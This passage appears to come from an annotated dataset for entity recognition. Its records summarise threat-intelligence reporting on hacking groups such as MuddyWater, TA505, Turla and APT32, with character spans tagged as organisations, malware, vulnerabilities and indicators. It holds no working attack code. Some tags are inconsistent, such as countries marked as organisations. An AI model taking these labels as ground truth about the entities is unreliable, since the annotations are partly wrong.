The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims\u2019 networks . FIN7 thus continues to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . MuddyWater is widely regarded as a long-lived APT group in the Middle East . From February to April 2019 , MuddyWater launched a series of spear-phishing attacks against governments , educational institutions , financial , telecommunications and defense companies in Turkey , Iran , Afghanistan , Iraq , Tajikistan and Azerbaijan . FIN7 thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . We also unearthed and detailed our other findings on MuddyWater , such as its connection to four Android malware variants and its use of false flag techniques , among others , in our report New MuddyWater Activities Uncovered: Threat Actors Used Multi-Stage Backdoors , False Flags , Android malware , and More . Instead , the campaign used compromised legitimate accounts to trick victims into installing malware . Notably , the group\u2019s use of email as infection vector seems to yield success for their campaigns . We also observed MuddyWater\u2019s use of multiple open source post-exploitation tools , which they deployed after successfully compromising a target . The attacker also connected to the compromised servers from IP addresses that were linked to dynamic domain names used as C&Cs by the delivered payloads . The main payload is usually Imminent Monitor RAT ; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT . 
In a case in June 2019 , we also noticed Warzone RAT being used . Xpert RAT reportedly first appeared in 2011 . The first version of Proyecto RAT\u201d was published at the end of 2010 . But with the West African gang we\u2019ve named Scattered Canary , we have a deeper look at how business email compromise is connected to the rest of the cybercrime .", "spans": [{"start": 38, "end": 47, "label": "Organization"}, {"start": 56, "end": 71, "label": "Organization"}, {"start": 164, "end": 170, "label": "Organization"}, {"start": 240, "end": 254, "label": "Organization"}, {"start": 279, "end": 292, "label": "Malware"}, {"start": 500, "end": 513, "label": "Vulnerability"}, {"start": 579, "end": 592, "label": "Malware"}, {"start": 648, "end": 661, "label": "Vulnerability"}, {"start": 664, "end": 675, "label": "Vulnerability"}, {"start": 712, "end": 721, "label": "Indicator"}, {"start": 746, "end": 757, "label": "Organization"}, {"start": 893, "end": 899, "label": "Organization"}, {"start": 987, "end": 1000, "label": "Vulnerability"}, {"start": 1003, "end": 1014, "label": "Vulnerability"}, {"start": 1042, "end": 1050, "label": "Indicator"}, {"start": 1121, "end": 1125, "label": "Organization"}, {"start": 1131, "end": 1144, "label": "Malware"}, {"start": 1155, "end": 1164, "label": "System"}, {"start": 1316, "end": 1330, "label": "Organization"}, {"start": 1559, "end": 1564, "label": "System"}, {"start": 1597, "end": 1606, "label": "Organization"}, {"start": 1670, "end": 1688, "label": "Organization"}, {"start": 1712, "end": 1718, "label": "Organization"}, {"start": 1790, "end": 1802, "label": "Malware"}, {"start": 1842, "end": 1859, "label": "Malware"}, {"start": 1903, "end": 1906, "label": "System"}, {"start": 1928, "end": 1930, "label": "Organization"}, {"start": 2050, "end": 2057, "label": "Organization"}, {"start": 2118, "end": 2132, "label": "Malware"}, {"start": 2165, "end": 2182, "label": "Malware"}, {"start": 2287, "end": 2296, "label": "Malware"}, {"start": 2312, 
"end": 2314, "label": "Indicator"}, {"start": 2350, "end": 2365, "label": "Organization"}, {"start": 2383, "end": 2387, "label": "Organization"}, {"start": 2517, "end": 2521, "label": "Organization"}, {"start": 2692, "end": 2707, "label": "Organization"}, {"start": 2741, "end": 2745, "label": "Organization"}, {"start": 2807, "end": 2816, "label": "Organization"}, {"start": 2817, "end": 2856, "label": "Organization"}, {"start": 2955, "end": 2959, "label": "Organization"}, {"start": 3094, "end": 3098, "label": "Organization"}, {"start": 3164, "end": 3169, "label": "System"}, {"start": 3339, "end": 3343, "label": "Organization"}, {"start": 3400, "end": 3425, "label": "Malware"}, {"start": 3538, "end": 3545, "label": "Indicator"}, {"start": 3713, "end": 3720, "label": "Indicator"}, {"start": 3836, "end": 3842, "label": "Organization"}, {"start": 3865, "end": 3883, "label": "Organization"}, {"start": 3933, "end": 3949, "label": "Organization"}, {"start": 3958, "end": 3967, "label": "Organization"}, {"start": 4046, "end": 4051, "label": "Organization"}, {"start": 4084, "end": 4100, "label": "Organization"}, {"start": 4122, "end": 4128, "label": "Organization"}, {"start": 4159, "end": 4164, "label": "Organization"}, {"start": 4230, "end": 4234, "label": "Organization"}, {"start": 4248, "end": 4257, "label": "Malware"}, {"start": 4266, "end": 4288, "label": "Malware"}, {"start": 4292, "end": 4302, "label": "Malware"}, {"start": 4401, "end": 4409, "label": "Organization"}, {"start": 4508, "end": 4512, "label": "Organization"}, {"start": 4586, "end": 4590, "label": "Organization"}, {"start": 4640, "end": 4648, "label": "Indicator"}, {"start": 4760, "end": 4765, "label": "System"}, {"start": 4825, "end": 4829, "label": "Organization"}, {"start": 4839, "end": 4854, "label": "Malware"}, {"start": 4939, "end": 4954, "label": "Organization"}, {"start": 4959, "end": 4979, "label": "Malware"}, {"start": 5002, "end": 5014, "label": "Malware"}, {"start": 5025, "end": 5034, "label": 
"Malware"}, {"start": 5097, "end": 5111, "label": "Vulnerability"}, {"start": 5117, "end": 5126, "label": "Malware"}, {"start": 5172, "end": 5177, "label": "Organization"}, {"start": 5187, "end": 5196, "label": "Organization"}, {"start": 5388, "end": 5392, "label": "Organization"}, {"start": 5521, "end": 5525, "label": "Organization"}, {"start": 5530, "end": 5536, "label": "Organization"}, {"start": 5552, "end": 5556, "label": "Indicator"}, {"start": 5576, "end": 5580, "label": "Organization"}, {"start": 5700, "end": 5704, "label": "Organization"}, {"start": 5742, "end": 5751, "label": "Organization"}, {"start": 5814, "end": 5821, "label": "Malware"}, {"start": 5826, "end": 5840, "label": "Malware"}, {"start": 5906, "end": 5910, "label": "Organization"}, {"start": 5944, "end": 5961, "label": "Organization"}, {"start": 5979, "end": 5988, "label": "Organization"}, {"start": 6036, "end": 6048, "label": "Organization"}, {"start": 6049, "end": 6057, "label": "Organization"}, {"start": 6058, "end": 6070, "label": "Organization"}, {"start": 6158, "end": 6167, "label": "Organization"}, {"start": 6312, "end": 6318, "label": "Organization"}, {"start": 6330, "end": 6346, "label": "Malware"}, {"start": 6360, "end": 6374, "label": "Malware"}, {"start": 6446, "end": 6455, "label": "Organization"}, {"start": 6477, "end": 6486, "label": "Organization"}, {"start": 6500, "end": 6509, "label": "Organization"}, {"start": 6615, "end": 6630, "label": "Organization"}, {"start": 6658, "end": 6665, "label": "Organization"}, {"start": 6690, "end": 6702, "label": "Malware"}, {"start": 6712, "end": 6722, "label": "Malware"}, {"start": 6785, "end": 6789, "label": "Organization"}, {"start": 6925, "end": 6935, "label": "Organization"}, {"start": 7032, "end": 7042, "label": "Organization"}, {"start": 7095, "end": 7106, "label": "Organization"}, {"start": 7109, "end": 7133, "label": "Organization"}, {"start": 7136, "end": 7145, "label": "Organization"}, {"start": 7148, "end": 7166, "label": 
"Organization"}, {"start": 7171, "end": 7178, "label": "Organization"}, {"start": 7257, "end": 7261, "label": "Organization"}, {"start": 7449, "end": 7459, "label": "Organization"}, {"start": 7493, "end": 7500, "label": "System"}, {"start": 7501, "end": 7508, "label": "Malware"}, {"start": 7642, "end": 7663, "label": "Malware"}, {"start": 7666, "end": 7677, "label": "Malware"}, {"start": 7680, "end": 7687, "label": "System"}, {"start": 7688, "end": 7695, "label": "Malware"}, {"start": 7737, "end": 7768, "label": "Malware"}, {"start": 7826, "end": 7833, "label": "Organization"}, {"start": 7841, "end": 7846, "label": "Malware"}, {"start": 7929, "end": 7941, "label": "Organization"}, {"start": 7970, "end": 7993, "label": "Malware"}, {"start": 8063, "end": 8071, "label": "Organization"}, {"start": 8119, "end": 8121, "label": "Indicator"}, {"start": 8193, "end": 8211, "label": "Malware"}, {"start": 8251, "end": 8262, "label": "Indicator"}, {"start": 8330, "end": 8348, "label": "Indicator"}, {"start": 8351, "end": 8362, "label": "Indicator"}, {"start": 8369, "end": 8374, "label": "Indicator"}, {"start": 8418, "end": 8429, "label": "Indicator"}, {"start": 8443, "end": 8452, "label": "Indicator"}, {"start": 8510, "end": 8523, "label": "Indicator"}, {"start": 8602, "end": 8618, "label": "Organization"}, {"start": 8659, "end": 8664, "label": "System"}]} {"text": "In this blog , Unit 42 provides details of the tools and tactics we observed on these compromised SharePoint servers , explain how we believe these connect to the Emissary Panda threat group . This investigation by the Agari Cyber Intelligence Division into the cybercriminal group we\u2019ve named Scattered Canary offers unprecedented visibility into eleven years of fraud and criminal activities , and the growth of a 419 startup into a fully operational BEC business . 
While this criminal organization\u2019s activities now center around BEC , and extend to romance scams , credit card fraud , check fraud , fake job listings , credential harvesting , tax schemes , and more , these actors came from much humbler beginnings , starting with basic Craigslist scams in 2008 . On November 29 , 2018 , Scattered Canary sent an attack email to Agari CFO Raymond Lim , enquiring as to his availability to send out a domestic wire transfer . Many feel that they have a home team advantage living in Nigeria , where they are free to pay off law enforcement to look the other ACT . Scattered Canary\u2019s fraudulent history can be traced as far back as October 2008 , when the group first arrived on the cybercriminal circuit . By March 2016 , one of Scattered Canary\u2019s members had built enough trust with a romance victim\u2014who we\u2019ll call Jane\u2014that she became a frequent source of new mule accounts for the group . Alpha\u2019s early role was fairly simple: engage with individuals , who he chose based on the goods they were selling , and then provide personal shipping addresses back to Omega . By all accounts , late 2015 was the beginning of BEC for Scattered Canary . The first type of attack Scattered Canary pivoted to was credential phishing . Between July 2015 and February 2016 , Scattered Canary\u2019s primary focus seemed to be mass harvesting general credentials using a Google Docs phishing page . In the first few months of their credential phishing ventures , Scattered Canary\u2019s sights were mostly set on Asian targets\u2014Malaysia and Japan , in particular . In November 2015 , the group started to focus on North American users , mostly in the United States . 
This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills .", "spans": [{"start": 15, "end": 22, "label": "Organization"}, {"start": 98, "end": 116, "label": "System"}, {"start": 163, "end": 177, "label": "Organization"}, {"start": 219, "end": 243, "label": "Organization"}, {"start": 294, "end": 310, "label": "Organization"}, {"start": 457, "end": 465, "label": "Organization"}, {"start": 488, "end": 502, "label": "Organization"}, {"start": 791, "end": 807, "label": "Organization"}, {"start": 823, "end": 828, "label": "System"}, {"start": 1001, "end": 1005, "label": "Organization"}, {"start": 1066, "end": 1084, "label": "Organization"}, {"start": 1231, "end": 1249, "label": "Organization"}, {"start": 1394, "end": 1401, "label": "Organization"}, {"start": 1628, "end": 1644, "label": "Organization"}, {"start": 1672, "end": 1688, "label": "Organization"}, {"start": 1764, "end": 1782, "label": "Organization"}, {"start": 1946, "end": 1964, "label": "Organization"}, {"start": 2219, "end": 2235, "label": "Organization"}]} {"text": "QiAnXin identified this APT group coded as \u2018APT-C-35\u2019 in 2017 , who is mainly targeting Pakistan and other South Asian countries for cyber espionage . In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . For over eighteen months from March 2017 until November 2018 , Scattered Canary\u2019s frequent enterprise-focused credential phishing campaigns almost exclusively targeted businesses in the United States and Canada . In July 2018 , following a trend we have observed across the entire BEC threat landscape , Scattered Canary changed their preferred cash out mechanism from wire transfers to gift cards . 
Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . Using personal information obtained from various sources , Scattered Canary started perpetrating fraud against US federal and state government agencies . In total , 35 actors have been tied to Scattered Canary\u2019s operations since the group emerged in 2008 . Just as with romance scams , actors make use of scripts and templates they can copy-and-paste without having to create something on their own . When it comes to engaging targets , Scattered Canary frequently maximized efficiencies through the use of scripts , or as some members of the group call them , formats.\u201d These formats are templated text documents that can contain several layers of phishing messages to send to potential victims . Recently , we unveiled the existence of a UEFI rootkit , called LoJax , which we attribute to the Sednit group . If Scattered Canary can be seen as a microcosm for the rapidly evolving organizations behind today\u2019s most pernicious email scams , this report demonstrates that a much more holistic approach\u2014one based on threat actor identity rather than type of fraudulent activity\u2014is required to detect email fraud and protect organizations . This is a first for an APT group , and shows Sednit has access to very sophisticated tools to conduct its espionage operations . Three years ago , the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia . In the past , Sednit used a similar technique for credential phishing . At the end of August 2018 , the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components . 
As we explained in our most recent blogpost about Zebrocy , the configuration of the backdoor is stored in in the resource section and is split into four different hex-encoded , encrypted blobs . The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . It used GitHub and Slack as tools for communication between the malware and its controller . On July 9 , we discovered a new version of SLUB delivered via another unique watering hole website . This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro\u2019s Zero Day Initiative ( ZDI ) that was just patched this April .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 43, "end": 53, "label": "Organization"}, {"start": 88, "end": 96, "label": "Organization"}, {"start": 162, "end": 178, "label": "Organization"}, {"start": 329, "end": 347, "label": "Organization"}, {"start": 570, "end": 586, "label": "Organization"}, {"start": 735, "end": 740, "label": "System"}, {"start": 761, "end": 777, "label": "Organization"}, {"start": 942, "end": 958, "label": "Organization"}, {"start": 1009, "end": 1034, "label": "Organization"}, {"start": 1076, "end": 1094, "label": "Organization"}, {"start": 1169, "end": 1175, "label": "Organization"}, {"start": 1188, "end": 1195, "label": "Malware"}, {"start": 1200, "end": 1209, "label": "Malware"}, {"start": 1320, "end": 1336, "label": "Organization"}, {"start": 1645, "end": 1650, "label": "Malware"}, {"start": 1679, "end": 1685, "label": "Organization"}, {"start": 1697, "end": 1713, "label": "Organization"}, {"start": 1982, "end": 1987, "label": "System"}, {"start": 2067, "end": 2073, "label": "Organization"}, {"start": 2093, "end": 2112, "label": "Malware"}, {"start": 2173, "end": 2179, "label": "Organization"}, {"start": 2302, "end": 2308, "label": "Organization"}, {"start": 2430, "end": 2435, "label": "System"}, {"start": 2586, "end": 2593, "label": 
"Organization"}, {"start": 2621, "end": 2629, "label": "Malware"}, {"start": 2754, "end": 2758, "label": "Organization"}, {"start": 2813, "end": 2826, "label": "Vulnerability"}, {"start": 2863, "end": 2865, "label": "Organization"}, {"start": 2871, "end": 2877, "label": "Malware"}, {"start": 2882, "end": 2887, "label": "Malware"}, {"start": 2999, "end": 3003, "label": "Organization"}, {"start": 3082, "end": 3095, "label": "Vulnerability"}, {"start": 3147, "end": 3180, "label": "Organization"}, {"start": 3183, "end": 3186, "label": "Organization"}]} {"text": "CTU researchers assess with moderate confidence that APT28 is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government . Since we published out last report on SLUB , the backdoor has been updated and several improvements were implemented . The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . During this attack , we found that the SLUB malware used two Slack teams sales-yww9809\u201d and marketing-pwx7789 . SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments . In April 2018 , SWEED began making use of a previously disclosed Office exploit . In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . We found them targeting countries in the Middle East such as United Arab Emirates and Saudi Arabia , as well as other countries such as India , Japan , Argentina , the Philippines , and South Korea . Similar to previous campaigns , the JAR was directly attached to emails and used file names such as Order_2018.jar . 
Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 53, "end": 58, "label": "Organization"}, {"start": 147, "end": 165, "label": "Organization"}, {"start": 206, "end": 210, "label": "Organization"}, {"start": 217, "end": 225, "label": "Malware"}, {"start": 291, "end": 295, "label": "Organization"}, {"start": 386, "end": 399, "label": "Vulnerability"}, {"start": 403, "end": 416, "label": "Vulnerability"}, {"start": 458, "end": 462, "label": "Organization"}, {"start": 531, "end": 536, "label": "Organization"}, {"start": 618, "end": 624, "label": "System"}, {"start": 670, "end": 675, "label": "Organization"}, {"start": 726, "end": 733, "label": "Vulnerability"}, {"start": 779, "end": 784, "label": "Organization"}, {"start": 827, "end": 836, "label": "Organization"}, {"start": 845, "end": 859, "label": "Vulnerability"}, {"start": 893, "end": 902, "label": "Organization"}, {"start": 1025, "end": 1029, "label": "Organization"}, {"start": 1252, "end": 1255, "label": "Indicator"}, {"start": 1281, "end": 1287, "label": "System"}, {"start": 1316, "end": 1330, "label": "Malware"}, {"start": 1366, "end": 1372, "label": "Indicator"}, {"start": 1385, "end": 1392, "label": "Vulnerability"}, {"start": 1397, "end": 1410, "label": "Vulnerability"}, {"start": 1454, "end": 1478, "label": "System"}]} {"text": "It is worth noting that during our investigation f-secure uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances . TA505 is also using FlowerPippi ( Backdoor.Win32.FLOWERPIPPI.A ) , a new backdoor that we found them using in their campaigns against targets in Japan , India , and Argentina . 
TA505 targeted Middle Eastern countries in a June 11 campaign that delivered more than 90% of the total spam emails to the UAE , Saudi Arabia , and Morroco . It fetches the same FlawedAmmyy downloader .msi file , then downloads the FlawedAmmyy payload . TA505 used Wizard (.wiz) files in this campaign , with FlawedAmmyy RAT as the final payload . On June 14 , we saw TA505\u2019s campaign still targeting UAE with similar tactics and techniques , but this time , some of the spam emails were delivered via the Amadey botnet . It later delivered an information stealer named EmailStealer , \u201d which stolesimple mail transfer protocol SMTP ) credentials and email addresses in the victim\u2019s machine . On June 18 , the majority of the campaign\u2019s spam emails were sent with the subject , Your RAKBANK Tax Invoice / Tax Credit Note\u201d or Confirmation . This campaign used the abovementioned .HTML file , malicious Excel/Word document VBA macro , the FlawedAmmyy payload , and Amadey . On June 24 , we found another campaign targeting Lebanon with the ServHelper malware . On June 17 , we observed the campaign\u2019s spam emails delivering malware-embedded Excel files directly as an attachment . On June 20 , we spotted the campaign\u2019s spam emails delivering .doc and .xls files . Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . After our analysis , we found that Proofpoint reported this malware as AndroMut as well . In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . Another new malware we found that TA505 is using in their campaigns last June 20 against targets in Japan , the Philippines , and Argentina is FlowerPippi . 
The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation . The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 . The comparison of the infection chains reveals in both cases TA505 used a couple of SFX stages to deploy the RMS\u201d software: a legitimate remote administration tool produced by the Russian company TektonIT . The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the Stealthy email Stealer\u201d part of their arsenal . Also , some code pieces are directly re-used in the analyzed campaigns , such as the i.cmd\u201d and exit.exe\u201d files , and , at the same time , some new components have been introduced , for instance the rtegre.exe\u201d and the veter1605_MAPS_10cr0.exe\u201d file . In 2018 , Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was based on the open-source project Posh-SecMod . Turla is believed to have been operating since at least 2008 , when it successfully breached the US military . This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products . However , it is likely the same scripts are used more globally against many traditional Turla targets in Western Europe and the Middle East . 
In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface ( AMSI ) .", "spans": [{"start": 117, "end": 125, "label": "Organization"}, {"start": 210, "end": 215, "label": "Organization"}, {"start": 230, "end": 241, "label": "Malware"}, {"start": 244, "end": 272, "label": "Malware"}, {"start": 283, "end": 291, "label": "Malware"}, {"start": 387, "end": 392, "label": "Organization"}, {"start": 496, "end": 502, "label": "System"}, {"start": 545, "end": 547, "label": "Organization"}, {"start": 619, "end": 638, "label": "Malware"}, {"start": 641, "end": 646, "label": "Organization"}, {"start": 652, "end": 671, "label": "Malware"}, {"start": 696, "end": 711, "label": "Malware"}, {"start": 755, "end": 762, "label": "Organization"}, {"start": 863, "end": 869, "label": "System"}, {"start": 893, "end": 906, "label": "Malware"}, {"start": 909, "end": 911, "label": "Organization"}, {"start": 957, "end": 969, "label": "Malware"}, {"start": 980, "end": 1014, "label": "Indicator"}, {"start": 1015, "end": 1019, "label": "Indicator"}, {"start": 1038, "end": 1043, "label": "System"}, {"start": 1129, "end": 1135, "label": "System"}, {"start": 1265, "end": 1270, "label": "System"}, {"start": 1288, "end": 1298, "label": "System"}, {"start": 1312, "end": 1317, "label": "Malware"}, {"start": 1324, "end": 1343, "label": "Malware"}, {"start": 1350, "end": 1356, "label": "Malware"}, {"start": 1425, "end": 1435, "label": "Indicator"}, {"start": 1491, "end": 1497, "label": "System"}, {"start": 1610, "end": 1616, "label": "System"}, {"start": 1670, "end": 1681, "label": "Indicator"}, {"start": 1746, "end": 1751, "label": "Organization"}, {"start": 1856, "end": 1866, "label": "Organization"}, {"start": 1892, "end": 1900, "label": "Organization"}, {"start": 2061, "end": 2066, "label": "Indicator"}, {"start": 2103, "end": 2108, "label": "Organization"}, {"start": 2212, "end": 2223, "label": "Malware"}, {"start": 
2240, "end": 2245, "label": "System"}, {"start": 2302, "end": 2306, "label": "Organization"}, {"start": 2416, "end": 2421, "label": "Organization"}, {"start": 2544, "end": 2549, "label": "Organization"}, {"start": 2665, "end": 2687, "label": "Organization"}, {"start": 2771, "end": 2776, "label": "Organization"}, {"start": 2847, "end": 2873, "label": "Malware"}, {"start": 2921, "end": 2926, "label": "Organization"}, {"start": 3026, "end": 3033, "label": "Organization"}, {"start": 3038, "end": 3044, "label": "Organization"}, {"start": 3120, "end": 3125, "label": "System"}, {"start": 3244, "end": 3250, "label": "Indicator"}, {"start": 3255, "end": 3264, "label": "Indicator"}, {"start": 3358, "end": 3369, "label": "Indicator"}, {"start": 3378, "end": 3403, "label": "Indicator"}, {"start": 3421, "end": 3430, "label": "Organization"}, {"start": 3471, "end": 3476, "label": "Organization"}, {"start": 3477, "end": 3494, "label": "Malware"}, {"start": 3551, "end": 3556, "label": "Organization"}, {"start": 3651, "end": 3659, "label": "Organization"}, {"start": 3689, "end": 3694, "label": "Organization"}, {"start": 3704, "end": 3714, "label": "Malware"}, {"start": 3878, "end": 3883, "label": "Organization"}, {"start": 3976, "end": 3981, "label": "Organization"}, {"start": 4008, "end": 4018, "label": "System"}, {"start": 4050, "end": 4076, "label": "System"}, {"start": 4079, "end": 4083, "label": "System"}]} {"text": "As Unit 42 have observed throughout our tracking of the OilRig group , adopting proven tactics has been a common behavior over time . Based on our research , SWEED \u2014 which has been operating since at least 2017 \u2014 primarily targets their victims with stealers and remote access trojans . It is interesting to note that Turla operators used the free email provider GMX again , as in the Outlook Backdoor and in LightNeuron . 
This new research confirms our forecast and shows that the Turla group does not hesitate to use open-source pen-testing frameworks to conduct intrusion . Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus aka OilRig , APT34 . Waterbug has been using Meterpreter since at least early 2018 and , in this campaign , used a modified version of Meterpreter , which was encoded and given a .wav extension in order to disguise its true purpose . In all likelihood , Waterbug\u2019s use of Crambus infrastructure appears to have been a hostile takeover . One of the most interesting things to occur during one of Waterbug\u2019s recent campaigns was that during an attack against one target in the Middle East , Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim\u2019s network . These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in addition to targets in the IT and education sectors . Curiously though , Waterbug also compromised other computers on the victim\u2019s network using its own infrastructure . Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug . Aside from the attack involving Crambus infrastructure , this sample of Mimikatz has only been seen used in one other attack , against an education target in the UK in 2017 . The first observed evidence of Waterbug activity came on January 11 , 2018 , when a Waterbug-linked tool (a task scheduler named msfgi.exe ) was dropped on to a computer on the victim\u2019s network . 
In the case of the attack against the Middle Eastern target , Crambus was the first group to compromise the victim\u2019s network , with the earliest evidence of activity dating to November 2017 . Waterbug\u2019s intrusions on the victim\u2019s network continued for much of 2018 . Symantec did not observe the initial access point and the close timeframe between Waterbug observed activity on the victim\u2019s network and its observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point .", "spans": [{"start": 3, "end": 10, "label": "Organization"}, {"start": 56, "end": 62, "label": "Organization"}, {"start": 158, "end": 163, "label": "Organization"}, {"start": 318, "end": 323, "label": "Organization"}, {"start": 348, "end": 353, "label": "System"}, {"start": 385, "end": 401, "label": "Malware"}, {"start": 409, "end": 420, "label": "Malware"}, {"start": 482, "end": 487, "label": "Organization"}, {"start": 543, "end": 553, "label": "Malware"}, {"start": 577, "end": 583, "label": "Indicator"}, {"start": 600, "end": 609, "label": "Organization"}, {"start": 685, "end": 694, "label": "Organization"}, {"start": 810, "end": 817, "label": "Organization"}, {"start": 822, "end": 828, "label": "Organization"}, {"start": 831, "end": 836, "label": "Organization"}, {"start": 839, "end": 847, "label": "Organization"}, {"start": 863, "end": 874, "label": "Malware"}, {"start": 953, "end": 964, "label": "Malware"}, {"start": 1072, "end": 1082, "label": "Organization"}, {"start": 1090, "end": 1112, "label": "Malware"}, {"start": 1213, "end": 1223, "label": "Organization"}, {"start": 1307, "end": 1315, "label": "Organization"}, {"start": 1462, "end": 1470, "label": "Organization"}, {"start": 1501, "end": 1523, "label": "Organization"}, {"start": 1528, "end": 1555, "label": "Organization"}, {"start": 1603, "end": 1605, "label": "Organization"}, {"start": 1610, "end": 1627, "label": "Organization"}, {"start": 1649, "end": 
1657, "label": "Organization"}, {"start": 1729, "end": 1743, "label": "Organization"}, {"start": 1746, "end": 1754, "label": "Organization"}, {"start": 1784, "end": 1792, "label": "Malware"}, {"start": 1826, "end": 1834, "label": "Organization"}, {"start": 1909, "end": 1917, "label": "Malware"}, {"start": 1975, "end": 1984, "label": "Organization"}, {"start": 2043, "end": 2051, "label": "Organization"}, {"start": 2141, "end": 2150, "label": "Indicator"}, {"start": 2270, "end": 2277, "label": "Organization"}, {"start": 2400, "end": 2410, "label": "Organization"}, {"start": 2475, "end": 2483, "label": "Organization"}, {"start": 2557, "end": 2565, "label": "Organization"}, {"start": 2669, "end": 2677, "label": "Organization"}, {"start": 2696, "end": 2718, "label": "Organization"}]} {"text": "The OceanLotus group was first revealed and named by QiAnXin in May 2015 . It also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool . Waterbug also used an older version of PowerShell , likely to avoid logging . In one of these campaigns , Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest . The malware then uses WebDAV to upload the RAR archive to a Box account .", "spans": [{"start": 4, "end": 14, "label": "Organization"}, {"start": 53, "end": 60, "label": "Organization"}, {"start": 100, "end": 109, "label": "Organization"}, {"start": 168, "end": 179, "label": "Malware"}, {"start": 182, "end": 190, "label": "Organization"}, {"start": 221, "end": 231, "label": "Malware"}, {"start": 288, "end": 296, "label": "Organization"}, {"start": 304, "end": 315, "label": "Malware"}, {"start": 401, "end": 408, "label": "Indicator"}, {"start": 419, "end": 425, "label": "Malware"}, {"start": 440, "end": 451, "label": "Indicator"}]} {"text": "The OceanLotus , an APT group said to have a Vietnamese background , was first exposed and named by QiAnXin in May 2015 . 
The DeepSight Managed Adversary and Threat Intelligence team co-authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug ( aka Turla ) Cyber Espionage group , and methods of detecting and thwarting activities of this adversary . The DeepSight MATI team authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug Cyber Espionage group , and methods of detecting and thwarting activities of this adversary . While reviewing a 2015 report\u2075 of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti\u2076 samples designed specifically for Linux\u2077 . Following these reports , Chronicle researchers doubled down on efforts to try to unravel the various campaigns where Winnti was leveraged . Distinct changes to Azazel by the Winnti developers include the addition of a function named \u2018Decrypt2\u2019 , which is used to decode an embedded configuration similar to the core implant . Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . We will see more from Zebrocy into 2019 on government and military related organizations . The PowerShell script will look at the architecture of the system to check which malicious DLL files should be downloaded . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . \bThe FBI issued a rare bulletin admitting that a group named APT6 hacked into US government computer systems as far back as 2011 and for years stole sensitive data . \bFireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123 . \bTrend Micro attributes this activity to MuddyWater , an Iran-nexus actor that has been active since at least May 2017 . 
\bFireEye assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . FireEye has observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks . On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . Kaspersky reveals that APT33 is a capable group that has carried out Cyber Espionage operations since at least 2013 . APT33 is the only group that Kaspersky has observed use the DROPSHOT dropper . The Cyber Espionage group APT32 heavily obfuscates their backdoors and scripts , and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017 . In all Mandiant investigations to date where the CARBANAK backdoor has been discovered , the activity has been attributed to the FIN7 threat group . Kaspersky released a similar report about the same group under the name Carbanak in February 2015 . FireEye assesses that APT32 leverages a unique suite of fully-featured malware . FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing , consumer products , and hospitality sectors . The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions . FireEye assesses that APT32 is a Cyber Espionage group aligned with Vietnamese government interests . In May and June 2017 , FireEye has associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . APT10 is a Chinese Cyber Espionage group that FireEye has 